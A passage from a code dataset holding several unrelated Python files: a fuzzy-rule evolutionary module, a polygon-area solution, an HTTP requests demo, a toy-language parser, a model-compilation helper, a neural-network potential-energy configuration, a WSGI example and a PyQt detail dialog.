self._extract_ind_tuple(ind_tuple)\n        self._nce.print_ind(ind_sp1, ind_sp2)\n\n    def get_ind_sp1_class(self):\n        return self._ind_sp1_class\n\n    def get_ind_sp2_class(self):\n        return self._ind_sp2_class\n\n    @staticmethod\n    def clone(ind: bitarray):\n        return ind.deep_copy()\n\n    def _create_cons_scaler(self):\n        # y_pred returned by NativeCocoEvaluator are in range\n        # [0, n_class_per_cons-1] and it needs to be scaled back to\n        # [min_val_cons, max_val_cons] (which for binary and multiclass\n        # consequents do nothing but this is needed for continuous variables)\n\n        cons_scaler = MinMaxScaler()\n        cons_scaler.fit(self._y.astype(np.double))\n        return cons_scaler\n\n    @staticmethod\n    def _extract_ind_tuple(ind_tuple):\n        # convert ind_sp{1,2} to string format to make them easy to use in C++\n        return ind_tuple[0].bits.to01(), ind_tuple[1].bits.to01()\n\n    def _post_predict(self, y_pred):\n        return self._scale_back_y(y_pred)\n\n    @staticmethod\n    def _generate_ind(n_bits):\n        bin_str = format(randint(0, (2 ** n_bits) - 1), \"0{}b\".format(n_bits))\n        return bitarray(bin_str)\n\n    def _compute_needed_bits_for_sp1(self):\n        n_lv_per_ind = 2 ** self._n_bits_per_lv\n        return int(n_lv_per_ind * self._n_true_labels * self._n_bits_per_mf)\n\n    def _compute_needed_bits_for_sp2(self):\n        # bits for r_sel_vars\n        n_bits_r_sel_vars = (\n            self._n_rules * self._n_max_vars_per_rule * self._n_bits_per_ant\n        )\n\n        # bits for r_lv\n        n_bits_r_lv = self._n_rules * self._n_max_vars_per_rule * self._n_bits_per_lv\n\n        # bits for r_labels\n        n_bits_r_labels = (\n            self._n_rules * self._n_max_vars_per_rule * self._n_bits_per_label\n        )\n\n        # bits for r_cons\n        n_bits_r_cons = self._n_rules * self._n_cons * self._n_bits_per_cons\n\n        n_total_bits = n_bits_r_sel_vars + n_bits_r_lv + n_bits_r_labels + n_bits_r_cons\n        return int(n_total_bits)  # int cast because of the multiple ceil() used above\n\n    def _compute_n_bits_per_cons(self):\n        n_max_classes = max(self._n_classes_per_cons)\n\n        # if all consequents are continuous variables (i.e. regression\n        # i.e. value = 0) then we use a minimum of self._n_labels_per_cons)\n        n_max_classes = max(n_max_classes, self._n_labels_cons.len())\n        return ceil(log(n_max_classes, 2))\n\n    def _compute_cons_n_labels(self, n_classes_per_cons):\n        cons_n_labels = n_classes_per_cons.copy().astype(int)\n        cons_n_labels[cons_n_labels == 0] = self._n_labels_cons.len()\n        return cons_n_labels\n\n    def _scale_back_y(self, y):\n        # -1 because y is in [0, cons_n_labels-1]\n        y_ = y / (self._cons_n_labels - 1)\n        return self._cons_scaler.inverse_transform(y_)\n\n    @staticmethod\n    def _minmax_norm(X_train):\n        scaler = MinMaxScaler()\n        X_train_scaled = scaler.fit_transform(X_train)\n        return X_train_scaled, scaler\n\n    @staticmethod\n    def _create_vars_range(scaler):\n        vars_range = np.vstack((scaler.data_min_, scaler.data_max_)).T.astype(np.double)\n        return vars_range\n\n    @staticmethod\n    def _convert_labelenum_to_int(labels_enums):\n        def is_int_or_numpy_int(v):\n            try:\n                return issubclass(v.dtype.type, (int, np.integer))\n            except:\n                return False\n\n        return [\n            cons if is_int_or_numpy_int(cons) else cons.value for cons in labels_enums\n        ]\n","repo_name":"krypty/trefle","sub_path":"trefle/evo/experiment/coco/coco_individual.py","file_name":"coco_individual.py","file_ext":"py","file_size_in_byte":21693,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"43517656332","text":"# There is a polygon made up of N (3 ≤ N ≤ 10,000) points on a 2D plane. 
Write a program that computes the area of this polygon.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\ndef polygon_area(x, y):\r\n    n = len(x)\r\n    area = 0\r\n    j = n - 1\r\n    for i in range(n):\r\n        area += (x[j] + x[i]) * (y[j] - y[i])\r\n        j = i\r\n    return abs(area / 2.0)\r\n\r\nn = int(input())\r\nX = []\r\nY = []\r\nfor i in range(n):\r\n    x, y = map(int, input().split())\r\n    X.append(x)\r\n    Y.append(y)\r\n\r\narea = polygon_area(X, Y)\r\nprint(round(area, 1))","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"2000~2999/2166.py","file_name":"2166.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4037718002","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:序\n\n\nimport requests\n\n# GET request\nparams = {\"word\": \"无涯\", \"pobook\": 0}\n\nurl = \"https://yuedu.baidu.com/search\"\n\nr = requests.get(url=url, params=params)\n\nprint(r.content.decode(\"gbk\"))\nprint(r.url)\n\n# POST request\n\nurl=\"http://httpbin.org/post\"\n\ndata={\"name\":\"Cesare\",\"age\":28}\n\nr=requests.post(url=url,data=data)\n\nprint(r.json())\n","repo_name":"CesareCheung/Autotest_Demo","sub_path":"requests库/params参数.py","file_name":"params参数.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34297213411","text":"from typing import Any, Generator, Optional, Callable\nfrom .ast_nodes import *\nfrom .lexer import Token, TokenType\n\n\nclass Parser:\n    def __init__(self, source_code: str, tokens: Generator[Token, None, None]):\n        self.source_code = source_code\n        self.tokens = tokens\n        self.current_token: Optional[Token] = None\n        self.next()\n\n    def next(self):\n        try:\n            self.current_token = next(self.tokens)\n        except StopIteration:\n            self.current_token = None\n        return self.current_token\n\n    def parse(self) -> Module:\n        functions: list[FunctionDeclaration] = []\n        while True:\n            self.skip_newlines()\n            if self.match(TokenType.KEYWORD, 'fn'):\n                functions.append(self.function_declaration())\n            else:\n                break\n            self.expect(TokenType.NEWLINE)\n        return Module(functions)\n\n    def program(self):\n        # Implement program rule\n        pass\n\n    def import_statement(self):\n        # Implement import_statement rule\n        pass\n\n    def structure_declaration(self):\n        # Implement structure_declaration rule\n        pass\n\n    def function_call_expression(self) -> FunctionCallExpression:\n        self.expect(TokenType.SYMBOL, \"<\")\n        function_name = self.expect(TokenType.IDENTIFIER).value\n\n        arguments: list[tuple[str, ASTNode]] = []\n        while not self.match(TokenType.SYMBOL, \"/>\") and not self.match(TokenType.SYMBOL, \">\"):\n            arg_name = self.expect(TokenType.IDENTIFIER).value\n            self.expect(TokenType.OPERATOR, \"=\")\n\n            # if self.match(TokenType.STRING_LITERAL):\n            #     arg_value = self.parse_string_literal()\n            # else:\n            self.expect(TokenType.SYMBOL, \"{\")\n            self.skip_newlines()\n            arg_value = self.expression()\n            self.skip_newlines()\n            self.expect(TokenType.SYMBOL, \"}\")\n            arguments.append((arg_name, arg_value))\n\n        children = None\n        if self.match(TokenType.SYMBOL, \"/>\"):\n            self.next()\n        else:\n            self.expect(TokenType.SYMBOL, \">\")\n            self.skip_newlines()\n            children: list[ASTNode] = []\n\n            while not self.match(TokenType.SYMBOL, \"</\"):\n                children.append(self.statement())\n                self.skip_newlines()\n\n            # consume the closing tag: \"</\" IDENTIFIER \">\"\n            self.expect(TokenType.SYMBOL, \"</\")\n            self.expect(TokenType.IDENTIFIER)\n            self.expect(TokenType.SYMBOL, \">\")\n\n        return FunctionCallExpression(function_name, arguments, children)\n\n    def function_declaration(self) -> FunctionDeclaration:\n        self.expect(TokenType.KEYWORD, 'fn')\n        name = self.expect(TokenType.IDENTIFIER)\n        [arguments, return_type, block] = 
self.function_after_identifier()\n return FunctionDeclaration(name.value, arguments, return_type, block)\n\n def function_after_identifier(self):\n self.expect(TokenType.SYMBOL, '(')\n self.skip_newlines()\n arguments = self.argument_list() if self.match(TokenType.IDENTIFIER) else []\n self.expect(TokenType.SYMBOL, ')')\n return_type = None\n if self.match(TokenType.SYMBOL, \"->\"):\n self.next()\n return_type = self.accessible_type_expression()\n return arguments, return_type, self.block()\n\n def block(self):\n self.expect(TokenType.SYMBOL, \"{\")\n self.skip_newlines()\n\n statements = []\n return_expression = None\n if self.has_next_statement():\n statements = self.statement_list()\n if self.match(TokenType.KEYWORD, \"return\"):\n self.next()\n return_expression = self.statement()\n self.skip_newlines()\n self.expect(TokenType.SYMBOL, \"}\")\n\n return Block(statements, return_expression)\n\n def has_next_statement(self):\n return not (self.match(TokenType.KEYWORD, \"return\") or self.match(TokenType.SYMBOL, \"}\"))\n\n def go_next_statement(self):\n if not self.match(TokenType.NEWLINE):\n return False\n self.skip_newlines()\n return self.has_next_statement()\n\n def statement_list(self):\n statements = [self.statement()]\n while self.go_next_statement():\n statements.append(self.statement())\n return statements\n\n def statement(self):\n return self.expression()\n\n def argument_list(self):\n arguments = [self.argument()]\n while self.match(TokenType.SYMBOL, \",\"):\n self.next()\n self.skip_newlines()\n if not self.match(TokenType.IDENTIFIER):\n break\n arguments.append(self.argument())\n return arguments\n\n def argument(self):\n identifier = Identifier(self.expect(TokenType.IDENTIFIER).value)\n self.expect(TokenType.SYMBOL, \":\")\n type_expression = self.accessible_type_expression()\n return Argument(identifier, type_expression)\n\n def accessible_type_expression(self) -> AccessibleTypeExpression:\n name = self.expect(TokenType.TYPE_EXPRESSION)\n child = None\n if self.match(TokenType.SYMBOL, \".\"):\n self.next()\n child = self.accessible_type_expression()\n return AccessibleTypeExpression(name.value, child)\n\n def export_statement(self):\n # Implement export_statement rule\n pass\n\n def type_expression(self):\n # Implement type_expression rule\n pass\n\n def expression(self):\n return self.or_expression()\n\n def or_expression(self):\n return self.binary_expression(self.and_expression, '||')\n\n def and_expression(self):\n return self.binary_expression(self.equality_expression, '&&')\n\n def equality_expression(self):\n return self.binary_expression(self.relational_expression, '==', '!=')\n\n def relational_expression(self):\n return self.binary_expression(self.range_expression, '<', '<=', '>', '>=')\n\n def range_expression(self):\n return self.binary_expression(self.additive_expression, '...', '..<')\n\n def additive_expression(self):\n return self.binary_expression(self.multiplicative_expression, '+', '-')\n\n def multiplicative_expression(self):\n return self.binary_expression(self.unary_expression, '*', '/', '%')\n\n def binary_expression(self, next_expression_fn: Callable[[], ASTNode], *ops: str):\n left = next_expression_fn()\n\n while self.current_token and self.current_token.type == TokenType.OPERATOR and self.current_token.value in ops:\n op = self.current_token.value\n self.next()\n self.skip_newlines()\n right = next_expression_fn()\n left = BinaryExpression(left, op, right)\n\n return left\n\n def unary_expression(self) -> ASTNode:\n if self.current_token and 
self.current_token.type == TokenType.OPERATOR and self.current_token.value in ['!', '-']:\n            op = self.current_token.value\n            self.next()\n            return UnaryExpression(op, self.primary_expression())\n        else:\n            return self.primary_expression()\n\n    def primary_expression(self) -> ASTNode:\n        if self.current_token.type == TokenType.IDENTIFIER:\n            name = self.current_token.value\n            self.next()\n            return IdentifierExpression(name)\n        elif self.match(TokenType.SYMBOL, \"<\"):\n            return self.function_call_expression()\n        elif self.current_token.type in [TokenType.INTEGER_LITERAL, TokenType.FLOAT_LITERAL, TokenType.BOOLEAN_LITERAL]:\n            literal_type = self.current_token.type\n            if literal_type == TokenType.INTEGER_LITERAL:\n                value = int(self.current_token.value)\n            elif literal_type == TokenType.FLOAT_LITERAL:\n                value = float(self.current_token.value)\n            elif literal_type == TokenType.BOOLEAN_LITERAL:\n                value = self.current_token.value == 'true'\n            self.next()\n            return LiteralExpression(value, literal_type)\n        else:\n            raise SyntaxError(f\"Unexpected token: {self.current_token}\")\n\n    def skip_newlines(self):\n        while self.current_token and self.current_token.type == TokenType.NEWLINE:\n            self.next()\n\n    def expect(self, token_type: TokenType, value: Optional[str] = None) -> Token:\n        if self.match(token_type, value):\n            token = self.current_token\n            self.next()\n            return token\n        else:\n            error_line = self.source_code.split(\n                '\\n')[self.current_token.line - 1]\n            raise SyntaxError(\n                f\"Expected {token_type} with value '{value}', but got {self.current_token.type} with value '{self.current_token.value}'\\n\"\n                f\"at {self.current_token.file_path}, line {self.current_token.line}, column {self.current_token.column}\\n\"\n                f\"{error_line}\\n\"\n                f\"{' ' * (self.current_token.column - 1)}^\")\n\n    def match(self, token_type: TokenType, value: Optional[str] = None):\n        return self.current_token != None and self.current_token.type == token_type and (value is None or self.current_token.value == value)\n","repo_name":"malt03/syvora","sub_path":"syvora/ast_creator/ast_parser.py","file_name":"ast_parser.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17218664266","text":"\nimport json, os\nimport logging\n\nfrom quackCompiler.quack import quack\n\n#Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\ndef invoke(inputpath, outputpath):\n\n    settingJson = getScriptFromPath(inputpath)\n    settingJson = json.loads(settingJson)\n\n    logger.error(settingJson['paramCount'])\n    logger.error(settingJson['outputpath'])\n\n    inputmodel = settingJson['outputpath']\n    modelScript = getScriptFromPath(inputmodel)\n    paramCount = int(settingJson['paramCount'])\n    content = modelScript\n    if paramCount > 0:\n        logger.error(settingJson['parameters'])\n        paramList = settingJson['parameters']\n        for (k,v) in paramList.items():\n            # accumulate substitutions so every parameter is applied, not just the last one\n            content = content.replace(\"<%\"+k+\"%>\", str(\"'\"+v+\"'\"))\n\n    logger.error(content)\n    quack(content, outputpath)\n\ndef getParamList(jsonContent):\n    jc = json.loads(str(jsonContent))\n    return jc\n\ndef getScriptFromPath(inputpath):\n    content = ''\n    with open(inputpath, 'r') as f:\n        try:\n            content = f.read()\n        finally:\n            f.close()\n    return content\n\ndef saveToFile(modelName, modelScript, paramCount, paramList = None, outputpath = None):\n    '''\n    Save the model to a .model file and the related information to .json\n    :param modelName:\n    :param modelScript:\n    :param paramCount:\n    :param paramList:\n    :param 
outputpath:\n :return:\n '''\n if not outputpath:\n outputpath = '/Users/xuzhang/Documents/TOOLS/PYTHON/Django/django_example/quackCompiler/output/'\n outputmodel = outputpath+modelName+'.model'\n with open(outputmodel, 'w') as f:\n f.write(modelScript)\n f.close()\n\n outputdict = {};\n outputdict['paramCount'] = paramCount # count of parameters\n outputdict['outputpath'] = outputmodel # the model's script\n\n if paramCount > 0:\n outputdict['parameters'] = paramList\n logger.error(outputdict)\n\n outputsetting = outputpath+modelName+'.json'\n with open(outputsetting, 'w') as f:\n json.dump(outputdict,f)\n f.close()\n\ndef readResult(infilepath):\n result_file = infilepath+'result.json'\n if not os.path.exists(result_file):\n return 0,[]\n count = 0\n result_list = []\n with open(result_file, 'r') as f:\n for line in f:\n count += 1\n jsonline = eval(line)\n if 'type' in jsonline:\n if jsonline['type'] == 'string':\n subresultpath = jsonline['value']\n with open(subresultpath, 'r') as subf:\n subresult = subf.readlines()\n result_list.append(subresult)\n print(jsonline['value'])\n elif jsonline['type'] == 'picture':\n print(jsonline['value'])\n elif jsonline['type'] == 'pdf':\n print(jsonline['value'])\n else:\n pass\n f.close()\n return count,result_list\n\n","repo_name":"xzhcn6/django_example","sub_path":"quackCompiler/invokeCompile.py","file_name":"invokeCompile.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7917392079","text":"# -*- coding: utf-8 -*-\n\n##\n## subject: WSGI アプリケーションを関数からオブジェクトに変更\n##\n\nimport os\n\n\nclass WSGIApplication(object):\n\n ## オブジェクトをあたかも関数のように呼び出すためのメソッド\n ## (注: Python では obj.__call__(x) を obj(x) と書ける)\n def __call__(self, environ, start_response):\n content = self._render_content(environ)\n #\n status = \"200 OK\"\n headers = [\n ('Content-Type', 'text/plain;charset-utf8'),\n ]\n start_response(status, headers)\n return [content.encode('utf-8')]\n\n ## コンテンツ生成機能を別メソッドに分離する\n def _render_content(self, environ):\n buf = []\n for key in sorted(environ.keys()):\n if key in os.environ:\n continue\n val = environ[key]\n typ = \"(%s)\" % type(val).__name__\n buf.append(\"%-25s %5s %r\\n\" % (key, typ, val))\n content = \"\".join(buf)\n return content\n\n\n## これはオブジェクトであるが、関数と同じように呼び出せる\n## (= wsgi_app(environ, start_response) として呼び出せる)。\n## そのため、今までの関数と同じように扱える。\nwsgi_app = WSGIApplication()\n\n\nif __name__ == \"__main__\":\n from wsgiref.simple_server import make_server\n wsgi_server = make_server('localhost', 7000, wsgi_app)\n wsgi_server.serve_forever()\n","repo_name":"kwatch/step-by-step","sub_path":"framework_python/fw03.py","file_name":"fw03.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11717732622","text":"import tensorflow as tf\nimport numpy\nfrom DiatPot_O2_UMN import V_O2_UMN\nfrom DiatPot_N2_DS import V_N2_DS, V_N2_LeRoy\n\nclass NNInput(object):\n\n TrainFlg = True\n GetIniWeightsFlg = 0\n TryNNFlg = 0\n WriteFinalFlg = 1 # Int Flag for Writing Parameters; =0: only at the end; =1: only .npz format at each improved iter; =2 .npz and .csv at each improved iter\n\n Machine = 'LINUX'\n if (Machine == 'MAC'):\n PathToSPES = '/Users/sventuri/WORKSPACE/Spebus/PESConstruction/' \n PathToSPESOutput = '/Users/sventuri/WORKSPACE/Spebus_OUTPUT/' \n elif (Machine == 'LINUX'):\n PathToSPES = '/home/venturi/WORKSPACE/Spebus/PESConstruction/'\n 
PathToSPESOutput = '/home/venturi/WORKSPACE/Spebus_OUTPUT/'\n\n\n # System = 'N3'\n # iPES = '1'\n # DiatPot_Fun = V_N2_DS\n # DiatPot_FunPrint = V_N2_LeRoy\n # PreLogShift = 1.0\n # PathToDataFldr = PathToSPES + '/Data_PES/' + System + '/Triat_David/PES_' + iPES + '/'\n System = 'O3'\n iPES = '9'\n DiatPot_Fun = V_O2_UMN\n DiatPot_FunPrint = V_O2_UMN\n PreLogShift = -3.5\n PathToDataFldr = PathToSPES + '/AbInitio_Data/' + System + '/UMN_AbInitio/Triat/PES_' + str(iPES) + '/'\n\n Model = 'ModPIP'\n BondOrderStr = 'MorseFun'\n if (Model=='ModPIP'):\n LayersName = ['InputLayer', 'BondOrderLayer', 'PIPLayer', 'HiddenLayer1', 'HiddenLayer2', 'OutputLayer']\n ActFun = [ None, None, tf.nn.tanh, tf.nn.tanh, None]\n NHid = [ 3, 6, 20, 10 ]\n NLayers = []\n Lambda = numpy.array([[1.0, 1.0, 1.0],[1.0, 1.0, 1.0]])\n re = numpy.array([[1.0, 1.0, 0.0],[1.0, 1.0, 1.0]])\n BiasesFlg = True\n PathToOutputFldr = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/TensorFlow/'\n PathToWeightFldr = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/TensorFlow/'\n CheckpointFilePath = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/Training/cp.ckpt' \n CheckpointFldr = PathToSPESOutput + '/Output_' + Machine + '/' + System + '_' + 'PES' + str(iPES) + '/Training/' \n elif (Model=='ModPIPPol'):\n LayersName = ['InputLayer', 'BondOrderLayer', 'PolLayer']\n NLayers = [3,1,1]\n Lambda = numpy.array([[1.0, 1.0, 1.0],[1.0, 1.0, 1.0]])\n re = numpy.array([[0.0, 0.0, 0.0],[0.0, 0.0, 0.0]])\n NOrd = 10\n BiasesFlg = False\n PathToOutputFldr = PathToSPES + '/../Output_' + Machine + '/ModPIPPol_Determ_' + str(NOrd) + '_Triat/' + System + '_' + iPES + '/'\n PathToWeightFldr = PathToSPES + '/../Output_' + Machine + '/ModPIPPol_Determ_' + str(NOrd) + '_Triat/' + System + '_' + iPES + '/'\n elif (Model=='PIP'):\n LayersName = ['InputLayer', 'HiddenLayer1', 'HiddenLayer2', 'OutputLayer']\n ActFun = [ lasagne.nonlinearities.tanh, lasagne.nonlinearities.tanh, lasagne.nonlinearities.linear]\n NHid = [ 30, 20 ]\n NLayers = []\n Lambda = numpy.array([[1.0, 1.0, 1.0],[1.0, 1.0, 1.0]])\n re = numpy.array([[0.0, 0.0, 0.0],[0.0, 0.0, 0.0]])\n BiasesFlg = True\n PathToOutputFldr = PathToSPESOutput + '/Output_' + Machine + '/PIP_Determ_' + str(NHid[0]) + '_' + str(NHid[1]) + '_Triat/' + System + '_' + iPES + '/'\n PathToWeightFldr = PathToSPESOutput + '/Output_' + Machine + '/PIP_Determ_' + str(NHid[0]) + '_' + str(NHid[1]) + '_Triat/' + System + '_' + iPES + '/'\n \n GenDataFlg = False\n NIn = 3\n NOut = 1\n #PercTrain = 1.0\n PercValid = 0.2\n RandomizeDataFlg = True\n NormalizeDataFlg = False\n\n NEpoch = 3000\n NMiniBatch = 30\n NPatience = 1000 \n NDeltaPatience = 2 \n ImpThold = 1.e-7\n\n Method = 'adam' # nesterov, rmsprop, adamax, amsgrad, adadelta\n LearningRate = 1.e-4\n kMomentum = 0.9\n EarlyStoppingFlg = False\n RMSProp = [0.85, 0.1]\n kWeightDecay = [0.0, 1.e-5]\n\n LossFunction = 'mse' # mean_squared_logarithmic_error, mse\n OutputExpon = 0.0\n Power = 5.0\n Shift = 7.27216\n\n OnlyTriatFlg = False\n MultErrorFlg = True\n AddDiatPointsFlg = 0\n\n #AngVector = [60,80,100,120,140,160,180]\n AngVector = [60]\n #AnglesCuts = numpy.array([110.0, 170.0, 60.0, 116.75])\n #RCuts = numpy.array([2.26767, 2.26767, 2.64562, 2.28203327])\n AnglesCuts = numpy.array([120.0])\n RCuts = numpy.array([2.073808])\n\n AbscissaConverter = 1.0\n\n if (System == 'O3') or (System == 'N3'):\n PIPTypeStr = 'PIP_A3'\n elif (System == 'CO2'):\n 
PIPTypeStr = 'PIP_A2B'\n\n    def __init__(self,\n                 System,\n                 DiatPot_Fun, \n                 Model,\n                 Lambda,\n                 re,\n                 GenDataFlg,\n                 PathToDataFldr,\n                 AngVector,\n                 NIn, \n                 NOut, \n                 PercValid, \n                 PercTest,\n                 RandomizeDataFlg, \n                 NormalizeDataFlg,\n                 WriteFinalFlg, \n                 LayersName,\n                 NEpoch, \n                 NMiniBatch, \n                 NIterMax, \n                 NHid, \n                 NLayers, \n                 ActFun, \n                 LearningRate,\n                 kMomentum, \n                 EarlyStoppingFlg, \n                 NPatience, \n                 NDeltaPatience, \n                 ImpThold, \n                 RMSProp, \n                 kWeightDecay, \n                 PathToOutputFldr, \n                 TryNNFlg,\n                 CheckpointFilePath,\n                 Method,\n                 LossFunction,\n                 GetIniWeightsFlg,\n                 PathToWeightFldr,\n                 OnlyTriatFlg,\n                 MultErrorFlg,\n                 PreLogShift,\n                 iPES,\n                 AnglesCuts,\n                 RCuts,\n                 AddDiatPointsFlg,\n                 OutputExpon,\n                 BondOrderStr,\n                 PIPTypeStr,\n                 Power,\n                 Shift,\n                 BiasesFlg, \n                 DiatPot_FunPrint,\n                 NOrd,\n                 AbscissaConverter,\n                 CheckpointFldr):\n        \n        self.Model = Model\n        self.System = System\n        self.DiatPot_Fun = DiatPot_Fun\n        self.Lambda = Lambda\n        self.re = re\n        self.GenDataFlg = GenDataFlg\n        self.PathToDataFldr = PathToDataFldr\n        self.AngVector = AngVector\n        self.NIn = NIn\n        self.NOut = NOut\n        self.PercValid = PercValid\n        self.PercTest = PercTest\n        self.RandomizeDataFlg = RandomizeDataFlg\n        self.NormalizeDataFlg = NormalizeDataFlg\n        self.WriteFinalFlg = WriteFinalFlg\n        self.LayersName = LayersName\n        self.NEpoch = NEpoch\n        self.NMiniBatch = NMiniBatch\n        self.NIterMax = NIterMax\n        self.NHid = NHid\n        self.NLayers = NLayers\n        self.ActFun = ActFun\n        self.LearningRate = LearningRate\n        self.kMomentum = kMomentum\n        self.EarlyStoppingFlg = EarlyStoppingFlg\n        self.NPatience = NPatience\n        self.NDeltaPatience = NDeltaPatience\n        self.ImpThold = ImpThold\n        self.LossFunction = LossFunction\n        self.Method = Method\n        self.RMSProp = RMSProp\n        self.kWeightDecay = kWeightDecay\n        self.CheckpointFilePath = CheckpointFilePath\n        self.PathToOutputFldr = PathToOutputFldr\n        self.TryNNFlg = TryNNFlg\n        self.GetIniWeightsFlg = GetIniWeightsFlg\n        self.PathToWeightFldr = PathToWeightFldr\n        self.OnlyTriatFlg = OnlyTriatFlg\n        self.MultErrorFlg = MultErrorFlg\n        self.PreLogShift = PreLogShift\n        self.AnglesCuts = AnglesCuts\n        self.RCuts = RCuts\n        self.iPES = iPES\n        self.AddDiatPointsFlg = AddDiatPointsFlg\n        self.OutputExpon = OutputExpon\n        self.BondOrderStr = BondOrderStr\n        self.PIPTypeStr = PIPTypeStr\n        self.Shift = Shift\n        self.Power = Power\n        self.BiasesFlg = BiasesFlg\n        self.DiatPot_FunPrint = DiatPot_FunPrint\n        self.NOrd = NOrd\n        self.AbscissaConverter = AbscissaConverter\n        self.CheckpointFldr = CheckpointFldr\n","repo_name":"simoneventuri/Spebus","sub_path":"PESConstruction/NN/TensorFlow_Keras/NNInput.py","file_name":"NNInput.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38519948435","text":"from PyQt5.Qt import Qt\nfrom PyQt5.QtWidgets import (QDialog, QFileDialog, QHeaderView, QMessageBox,\n                             QTableWidget, QTableWidgetItem)\n\nfrom libs.enumrations import UserPermission\nfrom libs.fields_translater import FieldsTranslater\nfrom libs.g import g\nfrom model.base import Base\nfrom model.zyrs import ZYRS\nfrom ui.page_elements.table_cells.check_combo_widget import CheckComboWidget\nfrom ui.page_elements.table_cells.date_widget import DateWidget\nfrom ui.page_elements.table_cells.file_widget import FileWidget\nfrom ui.page_elements.table_cells.normal_widget import NormalWidget\nfrom ui.page_elements.table_cells.pic_widget import PicWidget\nfrom ui.page_elements.table_cells.sex_widget import SexWidget\nfrom ui.wrapper.dialog_like_widget import 
create_dialog_like_widget\n\nfrom .dialogUI import Ui_Dialog\n\n\nclass DetailPage(QDialog):\n pic_item_height = 4\n\n def __init__(self, parent, model: Base):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.setWindowFlags(Qt.Window)\n self.setMinimumSize(800, 400)\n self.default_conditions = {}\n # model\n self.model = model\n self.need_pic = self.model.pic\n self.data_id = 0\n self.translator = FieldsTranslater(self.model)\n # tableWidget\n self.ui.tableWidget.setSelectionMode(QTableWidget.NoSelection)\n self.ui.tableWidget.cellChanged.connect(self.ui.tableWidget.resizeRowsToContents)\n # tableWidget-header\n hor_header = self.ui.tableWidget.horizontalHeader()\n hor_header.setSectionResizeMode(QHeaderView.Stretch)\n hor_header.setSectionResizeMode(0, QHeaderView.Fixed)\n hor_header.setSectionResizeMode(2, QHeaderView.Fixed)\n # btn-bind\n self.ui.btn_close.clicked.connect(self.close)\n self.ui.btn_append.clicked.connect(self.append)\n self.ui.btn_modify.clicked.connect(self.modify)\n self.ui.btn_delete.clicked.connect(self.delete)\n self.ui.btn_export.clicked.connect(self.export)\n\n def set_default_conditions(self, **kwargs):\n self.default_conditions = kwargs\n\n def append(self):\n data = self.get_data_from_table()\n if 'nickname' in data:\n zyrs = ZYRS.search(nickname=data['nickname'])['data']\n if zyrs:\n box = QMessageBox(QMessageBox.Question, \"添加人物信息\", \"已存在该人\")\n box.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n box.setDefaultButton(QMessageBox.Yes)\n box.button(QMessageBox.Yes).setText(\"显示详情\")\n box.button(QMessageBox.No).setText(\"直接添加\")\n res = box.exec_()\n if res == QMessageBox.Yes:\n if zyrs:\n if len(zyrs) == 1:\n dialog = DetailPage(self.parent(), ZYRS)\n dialog.show_(True, {'id': zyrs[0].id})\n else:\n from .pages import ZYRSChoicePage\n dialog = create_dialog_like_widget(self.parent(), ZYRSChoicePage())\n # dialog.setFixedSize(1500, 800)\n dialog.wrapped_widget.set_default_conditions(nickname=data['nickname'])\n dialog.exec_()\n return\n self.model.create(**data)\n self.close()\n\n def modify(self):\n data = self.get_data_from_table()\n item = self.model.get_by_id(self.data_id)\n for file in item.read_field:\n data.pop(file)\n item.modify(**data)\n self.close()\n\n def delete(self):\n res = QMessageBox.question(None, \"删除\", \"确认删除吗?\")\n if res == QMessageBox.No:\n return\n item = self.model.get_by_id(self.data_id)\n item.delete()\n self.close()\n\n def export(self):\n try:\n name = self.model.get_by_id(self.data_id).nickname\n except:\n name = self.data_id\n default_name = \"./{model}-{name}.docx\".format(model=self.model.class_name, name=name)\n filename = QFileDialog.getSaveFileName(None, \"导出文档\", default_name, \"word文档(*.docx)\")[0]\n if filename == \"\":\n return\n try:\n self.model.export_document(self.data_id, filename)\n except Exception as e:\n QMessageBox.warning(None, \"导出数据\", \"导出失败,请关闭目标文件!\")\n return\n\n QMessageBox.information(None, \"导出文档\", \"导出完成\")\n\n def refresh_data(self, id_: int):\n if id_ == -1:\n meta = self.model()\n for i, j in self.default_conditions.items():\n setattr(meta, i, j)\n else:\n meta = self.model.get_by_id(id_)\n if meta is None:\n print(\"Not found:\", self.model.class_name, \"id:\", id_)\n QMessageBox.critical(None, \"显示详情\", \"找不到该人员\")\n return False\n data_list = []\n filter_list = ['id', 'photo']\n filtered_data = {}\n for idx in meta.field:\n if idx in filter_list:\n filtered_data[idx] = getattr(meta, idx)\n continue\n comment = self.translator.to_text(idx)\n value = 
